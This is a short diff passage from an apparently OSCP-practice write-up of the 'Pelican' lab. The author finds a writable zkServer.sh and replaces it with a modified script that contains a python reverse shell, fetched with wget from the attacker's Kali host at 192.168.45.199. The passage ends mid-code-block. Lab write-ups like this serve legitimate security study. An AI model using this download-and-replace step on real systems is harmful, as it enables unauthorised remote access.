adrianosela/road-to-oscp/write-ups/proving-grounds/practice/intermediate/2024-03-04-Pelican/README.md

 -rwxr-xr-x  1 charles charles 5742 Feb 20  2014 zkServer.sh
 ```

-We can write to it.
-Let's try reverse shell and hope to get root.
+Let's try reverse shell.

+I serve the modified version of the script (which contains a python reverse shell) from my Kali machine, which I get with wget and replace the file in the target server.

 ```
 charles@pelican:/opt/zookeeper/bin$ wget -O zkServer.sh http://192.168.45.199/zkServerBad.sh